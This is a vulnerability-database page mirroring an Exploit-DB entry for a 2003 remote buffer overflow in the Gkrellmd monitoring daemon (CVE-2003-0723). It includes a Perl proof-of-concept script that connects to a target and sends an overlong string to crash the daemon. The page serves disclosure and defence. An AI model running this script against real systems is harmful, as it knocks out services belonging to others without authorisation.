Lucene search
+L

Gkrellmd 2.1 - Remote Buffer Overflow (1)

🗓️ 24 Jun 2003 00:00:00Reported by dodoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Gkrellmd 2.1 has a remote buffer overflow vulnerability allowing arbitrary code execution.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-0723
3 Sep 200304:00
cve
cvelist
Cvelist
CVE-2003-0723
3 Sep 200304:00
cvelist
debiancve
Debian CVE
CVE-2003-0723
3 Sep 200304:00
debiancve
exploitdb
Exploit DB
Gkrellmd 2.1 - Remote Buffer Overflow (2)
24 Jun 200300:00
exploitdb
euvd
EUVD
EUVD-2003-0714
3 Sep 200304:00
euvd
nessus
Tenable Nessus
Mandrake Linux Security Advisory : gkrellm (MDKSA-2003:087)
31 Jul 200400:00
nessus
nvd
NVD
CVE-2003-0723
20 Oct 200304:00
nvd
osv
OSV
DEBIAN-CVE-2003-0723
20 Oct 200304:00
osv
source: https://www.securityfocus.com/bid/8022/info

GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.

The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.

A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.

This vulnerability has been reported to affect Gkrellm 2.1.13.

	#!/usr/bin/perl -s
	use IO::Socket;
	#
	# proof of concept code
	# tested: grkellmd 2.1.10
	#



		if(!$ARGV[0] || !$ARGV[1])
		{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }

	$host = $ARGV[0];
	$port = $ARGV[1];
	$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

	$socket = new IO::Socket::INET
	(
	Proto    => "tcp",
	PeerAddr => $host,
	PeerPort => $port,
	);

	die "unable to connect to $host:$port ($!)\n" unless $socket;

	print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
	sleep(1);
	print $socket $exploitstring;

	close($socket);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03904
48